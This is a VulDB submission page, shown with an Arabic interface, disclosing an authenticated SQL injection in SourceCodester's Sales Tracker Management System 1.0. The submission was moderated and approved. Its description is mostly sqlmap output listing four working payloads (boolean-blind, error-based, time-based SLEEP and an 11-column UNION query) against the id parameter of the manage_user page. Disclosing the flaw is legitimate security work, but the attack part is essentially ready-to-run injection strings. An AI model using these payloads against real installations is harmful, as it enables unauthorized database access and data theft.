إرسال #93533: Authenticated SQL Injection on Sales Tracker System When edit Usersالمعلومات

عنوان	Authenticated SQL Injection on Sales Tracker System When edit Users
الوصف	# Exploit Title: Authenticated SQL Injection on Sales Tracker System When edit users # Google Dork: NA # Date: 23/2/2023 # Exploit Author: Ahmed Ismail (@MrOz1l) # Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html # Software Link: [download link if available] # Version: 1.0 # Tested on: Windows 11 # Check Detailed write-up : http://ahmedismailozil.blogspot.com/ ``` Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND 6468=6468-- rJGN Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' OR (SELECT 4534 FROM(SELECT COUNT(),CONCAT(0x71786b7871,(SELECT (ELT(4534=4534,1))),0x71786b7a71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ukvi Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=6' AND (SELECT 1530 FROM (SELECT(SLEEP(5)))BhAM)-- HmJE Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: http://localhost:80/php-sts/admin/?page=user/manage_user&id=-8360' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71786b7871,0x65786e556963514467496864494e4f4577696f4e76766b69444a454b77744c685470486e744e4f41,0x71786b7a71),NULL,NULL,NULL,NULL,NULL,NULL-- - --- [09:48:13] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.25, Apache 2.4.54 back-end DBMS: MySQL >= 5.0 (MariaDB fork) ```
المصدر	⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
المستخدم	mroz1l (UID 41497)
ارسال	23/02/2023 07:27 AM (3 سنوات منذ)
الاعتدال	23/02/2023 04:15 PM (9 hours later)
الحالة	تمت الموافقة
إدخال VulDB	221679 [SourceCodester Sales Tracker Management System 1.0 Edit User manage_user معرف حقن SQL]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Do you know our Splunk app?

Download it now for free!